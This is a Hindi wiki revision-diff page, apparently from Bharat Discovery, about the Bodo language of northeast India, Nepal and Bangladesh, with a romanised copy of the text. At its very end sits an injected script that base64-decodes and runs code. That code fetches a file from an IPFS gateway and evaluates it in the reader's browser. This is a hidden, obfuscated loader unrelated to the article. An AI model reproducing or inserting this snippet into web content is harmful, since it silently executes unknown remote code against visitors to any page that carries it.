Difference between revisions of "बोडो भाषा"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "==सम्बंधित लिंक==" to "==संबंधित लेख==")
 
(6 intermediate revisions by 3 users not shown)
Line 1: Line 1:
बोडो या बड़ो एक तिब्बती-बर्मी भाषा है जिसे [[भारत]] के उत्तरपूर्व, [[नेपाल]] और [[बांग्लादेश]] मे रहने वाले बोडो लोग बोलते हैं। बोडो भाषा भारतीय राज्य [[असम]] की आधिकारिक भाषाओं में से एक है। भारत में यह विशेष संवैधानिक दर्जा प्राप्त 22 अनुसूचित भाषाओं में से एक है।
+
'''बोडो''' या 'बड़ो' एक तिब्बती-बर्मी भाषा है, जिसे [[भारत]] के उत्तरपूर्व, [[नेपाल]] और [[बांग्लादेश]] में रहने वाले [[बोडो]] लोग बोलते हैं।
  
{{लेख प्रगति
+
*बोडो भाषा भारतीय राज्य [[असम]] की आधिकारिक भाषाओं में से एक है।
|आधार=आधार1
+
*[[भारत]] में यह विशेष संवैधानिक दर्जा प्राप्त 22 अनुसूचित भाषाओं में से एक है।
|प्रारम्भिक=
+
 
|माध्यमिक=
+
 
|पूर्णता=
+
{{लेख प्रगति |आधार= |प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध= }}
|शोध=
 
}}
 
 
==संबंधित लेख==
 
==संबंधित लेख==
 
{{भाषा और लिपि}}
 
{{भाषा और लिपि}}
 
[[Category:असम]][[Category:भाषा और लिपि]][[Category:साहित्य कोश]]
 
[[Category:असम]][[Category:भाषा और लिपि]][[Category:साहित्य कोश]]
 
__INDEX__
 
__INDEX__

Latest revision as of 12:47, 9 October 2014

bodo ya 'b do' ek tibbati-barmi bhasha hai, jise bharat ke uttarapoorv, nepal aur baangladesh mean rahane vale bodo log bolate haian.

  • bodo bhasha bharatiy rajy asam ki adhikarik bhashaoan mean se ek hai.
  • bharat mean yah vishesh sanvaidhanik darja prapt 22 anusoochit bhashaoan mean se ek hai.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>